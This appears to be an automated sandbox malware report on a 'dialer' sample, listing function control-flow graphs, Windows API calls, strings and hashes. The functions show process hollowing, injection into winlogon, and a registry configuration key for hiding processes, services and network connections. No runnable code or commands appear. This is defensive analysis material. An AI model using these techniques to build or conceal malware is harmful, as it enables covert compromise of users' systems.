                                                                                • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                                • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                                                • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                                • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                                                Non-executed Functions

                                                                                Function 0000000140002560 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 296memoryregistryfileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 184 140002560-14000258c 185 140002592 184->185 186 14000273a-140002742 184->186 187 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 185->187 188 140002598-14000259f 185->188 189 140002748-14000274b 186->189 190 14000297e-1400029a2 ReadFile 186->190 191 140002a74-140002a8e 187->191 193 140002704-140002715 187->193 194 1400025a5-1400025a8 188->194 195 1400026bd-1400026bf ExitProcess 188->195 196 140002751-140002756 189->196 197 140002974-140002979 call 14000175c 189->197 190->191 192 1400029a8-1400029af 190->192 192->191 201 1400029b5-1400029c9 call 1400018ac 192->201 193->191 202 14000271b-140002733 call 1400010c0 193->202 203 1400025ae-1400025b1 194->203 204 140002660-14000268b RegOpenKeyExW 194->204 198 140002919-14000292c call 140001944 196->198 199 14000275c-14000275f 196->199 197->191 198->191 226 140002932-140002941 call 140001944 198->226 205 140002761-140002766 199->205 206 14000279d-1400027ae call 140001944 199->206 201->191 224 1400029cf-1400029d5 201->224 227 140002735 202->227 213 140002651-14000265b 203->213 214 1400025b7-1400025ba 203->214 211 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 204->211 212 14000268d-14000269b RegDeleteValueW 204->212 205->191 215 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 205->215 206->191 235 1400027b4-1400027d6 ReadFile 206->235 211->191 212->211 213->191 221 140002644-14000264c 214->221 222 1400025c0-1400025c5 214->222 221->191 222->191 229 1400025cb-1400025ef ReadFile 222->229 233 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 224->233 234 140002a5f 224->234 226->191 250 140002947-14000296f ShellExecuteW 226->250 227->191 229->191 231 1400025f5-1400025fc 229->231 231->191 238 140002602-140002616 call 1400018ac 231->238 253 140002a18-140002a1e 233->253 254 140002a49-140002a4f GetProcessHeap 233->254 240 140002a66-140002a6f call 140002a90 234->240 235->191 242 1400027dc-1400027e3 235->242 238->191 259 14000261c-140002622 238->259 240->191 242->191 249 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 242->249 255 14000290b-140002914 GetProcessHeap 249->255 256 14000282d-140002839 249->256 250->191 253->254 260 140002a20-140002a32 253->260 257 140002a52-140002a5d HeapFree 254->257 255->257 256->255 261 14000283f-14000284b 256->261 257->191 263 140002624-140002633 call 1400010c0 259->263 264 140002638-14000263f 259->264 265 140002a34-140002a36 260->265 266 140002a38-140002a40 260->266 261->255 267 140002851-14000285c 261->267 263->191 264->240 265->266 271 140002a44 call 1400016cc 265->271 266->254 272 140002a42 266->272 268 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 267->268 269 14000285e-140002869 267->269 268->255 269->255 273 14000286f-14000287c call 140001c88 269->273 271->254 272->260 273->255
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                                                • String ID: SOFTWARE$dialerstager$open
                                                                                • API String ID: 3276259517-3931493855
                                                                                • Opcode ID: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                                                • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                                                • Opcode Fuzzy Hash: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                                                • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741
                                                                                Function 0000000140001C88 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 154injectionthreadmemoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 280 140001c88-140001cb8 281 140001cbb-140001cc8 280->281 282 140001e8c-140001e91 281->282 283 140001cce-140001d25 CreateProcessW 281->283 282->281 286 140001e97 282->286 284 140001e88 283->284 285 140001d2b-140001d5a VirtualAllocEx 283->285 284->282 287 140001e5d-140001e60 285->287 288 140001d60-140001d7b WriteProcessMemory 285->288 289 140001e99-140001eb9 286->289 290 140001e62-140001e76 OpenProcess 287->290 291 140001e85 287->291 288->287 292 140001d81-140001d87 288->292 290->284 293 140001e78-140001e83 TerminateProcess 290->293 291->284 294 140001dd2-140001def VirtualAlloc 292->294 295 140001d89 292->295 293->284 294->287 296 140001df1-140001e07 GetThreadContext 294->296 297 140001d8c-140001dba WriteProcessMemory 295->297 296->287 299 140001e09-140001e2e WriteProcessMemory 296->299 297->287 298 140001dc0-140001dcc 297->298 298->297 300 140001dce 298->300 299->287 301 140001e30-140001e4c SetThreadContext 299->301 300->294 301->287 302 140001e4e-140001e5b ResumeThread 301->302 302->287 303 140001eba-140001ebf 302->303 303->289
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                                                • String ID: @
                                                                                • API String ID: 3462610200-2766056989
                                                                                • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                                • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                                                • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                                • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                                                                                Function 00000001400019C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102memorycomCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                • String ID: dialersvc64
                                                                                • API String ID: 4184240511-3881820561
                                                                                • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                                • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                                                • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                                • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                                                Function 0000000140001000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Delete$CloseEnumOpen
                                                                                • String ID: SOFTWARE\dialerconfig
                                                                                • API String ID: 3013565938-461861421
                                                                                • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                                • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                                                • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                                • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                                                Function 0000000140002A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: File$Write$CloseCreateHandle
                                                                                • String ID: \\.\pipe\dialercontrol_redirect64
                                                                                • API String ID: 148219782-3440882674
                                                                                • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                                • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                                                • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                                • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                                                Function 0000000140001914 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: ntdll.dll
                                                                                • API String ID: 1646373207-2227199552
                                                                                • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                                • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                                                • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                                • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                                                Execution Graph

                                                                                Execution Coverage:1.3%
                                                                                Dynamic/Decrypted Code Coverage:94.4%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:107
                                                                                Total number of Limit Nodes:16
                                                                                execution_graph 22222 1e858985cf0 22223 1e858985cfd 22222->22223 22224 1e858985d09 22223->22224 22232 1e858985e1a 22223->22232 22225 1e858985d3e 22224->22225 22226 1e858985d8d 22224->22226 22227 1e858985d66 SetThreadContext 22225->22227 22227->22226 22228 1e858985e41 VirtualProtect FlushInstructionCache 22228->22232 22229 1e858985efe 22230 1e858985f1e 22229->22230 22244 1e8589843e0 VirtualFree 22229->22244 22240 1e858984df0 GetCurrentProcess 22230->22240 22232->22228 22232->22229 22234 1e858985f23 22235 1e858985f77 22234->22235 22236 1e858985f37 ResumeThread 22234->22236 22245 1e858987940 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry capture_previous_context 22235->22245 22237 1e858985f6b 22236->22237 22237->22234 22239 1e858985fbf 22243 1e858984e0c 22240->22243 22241 1e858984e22 VirtualProtect FlushInstructionCache 22241->22243 22242 1e858984e53 22242->22234 22243->22241 22243->22242 22244->22230 22245->22239 22246 1e85895273c 22247 1e85895276a 22246->22247 22248 1e8589527c5 VirtualAlloc 22247->22248 22250 1e8589528d4 22247->22250 22248->22250 22251 1e8589527ec 22248->22251 22249 1e858952858 LoadLibraryA 22249->22251 22251->22249 22251->22250 22252 1e8589828c8 22253 1e85898290e 22252->22253 22254 1e858982970 22253->22254 22256 1e858983844 22253->22256 22257 1e858983851 StrCmpNIW 22256->22257 22258 1e858983866 22256->22258 22257->22258 22258->22253 22259 1e858983ab9 22262 1e858983a06 22259->22262 22260 1e858983a70 22261 1e858983a56 VirtualQuery 22261->22260 22261->22262 22262->22260 22262->22261 22263 1e858983a8a VirtualAlloc 22262->22263 22263->22260 22264 1e858983abb GetLastError 22263->22264 22264->22260 22264->22262 22265 1e858981abc 22271 1e858981628 GetProcessHeap 22265->22271 22267 1e858981ad2 Sleep SleepEx 22269 1e858981acb 22267->22269 22269->22267 22270 1e858981598 StrCmpIW StrCmpW 22269->22270 22316 1e8589818b4 9 API calls 22269->22316 22270->22269 22272 1e858981648 __free_lconv_num 22271->22272 22317 1e858981268 GetProcessHeap 22272->22317 22274 1e858981650 22275 1e858981268 2 API calls 22274->22275 22276 1e858981661 22275->22276 22277 1e858981268 2 API calls 22276->22277 22278 1e85898166a 22277->22278 22279 1e858981268 2 API calls 22278->22279 22280 1e858981673 22279->22280 22281 1e85898168e RegOpenKeyExW 22280->22281 22282 1e8589816c0 RegOpenKeyExW 22281->22282 22283 1e8589818a6 22281->22283 22284 1e8589816e9 22282->22284 22285 1e8589816ff RegOpenKeyExW 22282->22285 22283->22269 22328 1e8589812bc 11 API calls __free_lconv_num 22284->22328 22287 1e858981723 22285->22287 22288 1e85898173a RegOpenKeyExW 22285->22288 22321 1e85898104c RegQueryInfoKeyW 22287->22321 22290 1e858981775 RegOpenKeyExW 22288->22290 22291 1e85898175e 22288->22291 22295 1e8589817b0 RegOpenKeyExW 22290->22295 22296 1e858981799 22290->22296 22329 1e8589812bc 11 API calls __free_lconv_num 22291->22329 22292 1e8589816f5 RegCloseKey 22292->22285 22299 1e8589817d4 22295->22299 22300 1e8589817eb RegOpenKeyExW 22295->22300 22330 1e8589812bc 11 API calls __free_lconv_num 22296->22330 22297 1e85898176b RegCloseKey 22297->22290 22331 1e8589812bc 11 API calls __free_lconv_num 22299->22331 22303 1e858981826 RegOpenKeyExW 22300->22303 22304 1e85898180f 22300->22304 22301 1e8589817a6 RegCloseKey 22301->22295 22306 1e858981861 RegOpenKeyExW 22303->22306 22307 1e85898184a 22303->22307 22305 1e85898104c 4 API calls 22304->22305 22309 1e85898181c RegCloseKey 22305->22309 22311 1e858981885 22306->22311 22312 1e85898189c RegCloseKey 22306->22312 22310 1e85898104c 4 API calls 22307->22310 22308 1e8589817e1 RegCloseKey 22308->22300 22309->22303 22313 1e858981857 RegCloseKey 22310->22313 22314 1e85898104c 4 API calls 22311->22314 22312->22283 22313->22306 22315 1e858981892 RegCloseKey 22314->22315 22315->22312 22332 1e858996168 22317->22332 22319 1e858981283 GetProcessHeap 22320 1e8589812ae __free_lconv_num 22319->22320 22320->22274 22322 1e8589811b5 RegCloseKey 22321->22322 22323 1e8589810bf 22321->22323 22322->22288 22323->22322 22324 1e8589810cf RegEnumValueW 22323->22324 22326 1e858981125 __free_lconv_num 22324->22326 22325 1e85898114e GetProcessHeap 22325->22326 22326->22322 22326->22324 22326->22325 22327 1e85898116e GetProcessHeap 22326->22327 22327->22326 22328->22292 22329->22297 22330->22301 22331->22308 22333 1e85898554d 22335 1e858985554 22333->22335 22334 1e8589855bb 22335->22334 22336 1e858985637 VirtualProtect 22335->22336 22337 1e858985671 22336->22337 22338 1e858985663 GetLastError 22336->22338 22338->22337 22339 1e8589b273c 22340 1e8589b276a 22339->22340 22341 1e8589b27c5 VirtualAlloc 22340->22341 22342 1e8589b27ec 22340->22342 22341->22342

                                                                                Executed Functions

                                                                                Function 000001E858981628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 106492572-2879589442
                                                                                • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction ID: 21d86d412d1650ae27b0043b2d401094e46d8c624b6cd0b43ec9435d42789ffa
                                                                                • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction Fuzzy Hash: 2D710A36321A91C6EB10AF66E8916EDB3A5FF84B98F401132DE4E57B69EF38C454C740
                                                                                Function 000001E858983790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID: wr
                                                                                • API String ID: 1092925422-2678910430
                                                                                • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction ID: d234e4461be7ce666b4697da3425b0a366aa51e2e4cc7be98c343ce9cae75724
                                                                                • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction Fuzzy Hash: 05115B36724BC1C2EF159B22E4086ADB2A1FB88B85F44003ADE8E07794EF3DC505CB04
                                                                                Function 000001E858985B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 59 1e858985b30-1e858985b57 60 1e858985b59-1e858985b68 59->60 61 1e858985b6b-1e858985b76 GetCurrentThreadId 59->61 60->61 62 1e858985b82-1e858985b89 61->62 63 1e858985b78-1e858985b7d 61->63 65 1e858985b9b-1e858985baf 62->65 66 1e858985b8b-1e858985b96 call 1e858985960 62->66 64 1e858985faf-1e858985fc6 call 1e858987940 63->64 69 1e858985bbe-1e858985bc4 65->69 66->64 72 1e858985c95-1e858985cb6 69->72 73 1e858985bca-1e858985bd3 69->73 77 1e858985cbc-1e858985cdc GetThreadContext 72->77 78 1e858985e1f-1e858985e30 call 1e8589874bf 72->78 75 1e858985bd5-1e858985c18 call 1e8589885c0 73->75 76 1e858985c1a-1e858985c8d call 1e858984510 call 1e8589844b0 call 1e858984470 73->76 88 1e858985c90 75->88 76->88 81 1e858985ce2-1e858985d03 77->81 82 1e858985e1a 77->82 93 1e858985e35-1e858985e3b 78->93 81->82 91 1e858985d09-1e858985d12 81->91 82->78 88->69 95 1e858985d92-1e858985da3 91->95 96 1e858985d14-1e858985d25 91->96 97 1e858985e41-1e858985e98 VirtualProtect FlushInstructionCache 93->97 98 1e858985efe-1e858985f0e 93->98 99 1e858985e15 95->99 100 1e858985da5-1e858985dc3 95->100 102 1e858985d27-1e858985d3c 96->102 103 1e858985d8d 96->103 106 1e858985ec9-1e858985ef9 call 1e8589878ac 97->106 107 1e858985e9a-1e858985ea4 97->107 104 1e858985f10-1e858985f17 98->104 105 1e858985f1e-1e858985f2a call 1e858984df0 98->105 100->99 108 1e858985dc5-1e858985e0c call 1e858983900 100->108 102->103 110 1e858985d3e-1e858985d88 call 1e858983970 SetThreadContext 102->110 103->99 104->105 111 1e858985f19 call 1e8589843e0 104->111 122 1e858985f2f-1e858985f35 105->122 106->93 107->106 113 1e858985ea6-1e858985ec1 call 1e858984390 107->113 108->99 124 1e858985e10 call 1e8589874dd 108->124 110->103 111->105 113->106 125 1e858985f77-1e858985f95 122->125 126 1e858985f37-1e858985f75 ResumeThread call 1e8589878ac 122->126 124->99 128 1e858985f97-1e858985fa6 125->128 129 1e858985fa9 125->129 126->122 128->129 129->64
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Current$Context
                                                                                • String ID:
                                                                                • API String ID: 1666949209-0
                                                                                • Opcode ID: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                                                • Instruction ID: a4617b46cd32b3a0414ab7f2d2c5e1ab313b6a71b2cba704dad36ec99b28e09a
                                                                                • Opcode Fuzzy Hash: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                                                • Instruction Fuzzy Hash: 9DD17776214B89C6DB709B56E49439EB7A0FB88B84F500126EE8D47BA9DF3CC545CF40
                                                                                Function 000001E8589850D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 131 1e8589850d0-1e8589850fc 132 1e85898510d-1e858985116 131->132 133 1e8589850fe-1e858985106 131->133 134 1e858985127-1e858985130 132->134 135 1e858985118-1e858985120 132->135 133->132 136 1e858985141-1e85898514a 134->136 137 1e858985132-1e85898513a 134->137 135->134 138 1e858985156-1e858985161 GetCurrentThreadId 136->138 139 1e85898514c-1e858985151 136->139 137->136 141 1e858985163-1e858985168 138->141 142 1e85898516d-1e858985174 138->142 140 1e8589856d3-1e8589856da 139->140 141->140 143 1e858985181-1e85898518a 142->143 144 1e858985176-1e85898517c 142->144 145 1e858985196-1e8589851a2 143->145 146 1e85898518c-1e858985191 143->146 144->140 147 1e8589851a4-1e8589851c9 145->147 148 1e8589851ce-1e858985225 call 1e8589856e0 * 2 145->148 146->140 147->140 153 1e858985227-1e85898522e 148->153 154 1e85898523a-1e858985243 148->154 155 1e858985230 153->155 156 1e858985236 153->156 157 1e858985255-1e85898525e 154->157 158 1e858985245-1e858985252 154->158 159 1e8589852b0-1e8589852b6 155->159 160 1e8589852a6-1e8589852aa 156->160 161 1e858985260-1e858985270 157->161 162 1e858985273-1e858985298 call 1e858987870 157->162 158->157 163 1e8589852e5-1e8589852eb 159->163 164 1e8589852b8-1e8589852d4 call 1e858984390 159->164 160->159 161->162 172 1e85898532d-1e858985342 call 1e858983cc0 162->172 173 1e85898529e 162->173 167 1e858985315-1e858985328 163->167 168 1e8589852ed-1e85898530c call 1e8589878ac 163->168 164->163 174 1e8589852d6-1e8589852de 164->174 167->140 168->167 178 1e858985351-1e85898535a 172->178 179 1e858985344-1e85898534c 172->179 173->160 174->163 180 1e85898536c-1e8589853ba call 1e858988c60 178->180 181 1e85898535c-1e858985369 178->181 179->160 184 1e8589853c2-1e8589853ca 180->184 181->180 185 1e8589853d0-1e8589854bb call 1e858987440 184->185 186 1e8589854d7-1e8589854df 184->186 198 1e8589854bd 185->198 199 1e8589854bf-1e8589854ce call 1e858984060 185->199 188 1e8589854e1-1e8589854f4 call 1e858984590 186->188 189 1e858985523-1e85898552b 186->189 200 1e8589854f6 188->200 201 1e8589854f8-1e858985521 188->201 190 1e858985537-1e858985546 189->190 191 1e85898552d-1e858985535 189->191 196 1e858985548 190->196 197 1e85898554f 190->197 191->190 195 1e858985554-1e858985561 191->195 203 1e858985563 195->203 204 1e858985564-1e8589855b9 call 1e8589885c0 195->204 196->197 197->195 198->186 207 1e8589854d0 199->207 208 1e8589854d2 199->208 200->189 201->186 203->204 210 1e8589855c8-1e858985661 call 1e858984510 call 1e858984470 VirtualProtect 204->210 211 1e8589855bb-1e8589855c3 204->211 207->186 208->184 216 1e858985671-1e8589856d1 210->216 217 1e858985663-1e858985668 GetLastError 210->217 216->140 217->216
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                                                • Instruction ID: fa7807662b3792369c97fc6f37bebb2b001074cd7c6065ce50333d33d1213250
                                                                                • Opcode Fuzzy Hash: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                                                • Instruction Fuzzy Hash: 11029436229BC5C6EB60CB59E49079EB7A1F785794F104026EA8E87BA9DF7CC454CF00
                                                                                Function 000001E8589839E0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$AllocQuery
                                                                                • String ID:
                                                                                • API String ID: 31662377-0
                                                                                • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                                • Instruction ID: 5ad133b89d074dd97bec0c1f73fb02c24c1f243091b434175b3c7d6c02ead25a
                                                                                • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                                • Instruction Fuzzy Hash: E531EC32239AC5C1EA70DA15E85539EF6A4FB88784F500536EACE46BA8DF7DC5809F04
                                                                                Function 000001E85898328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
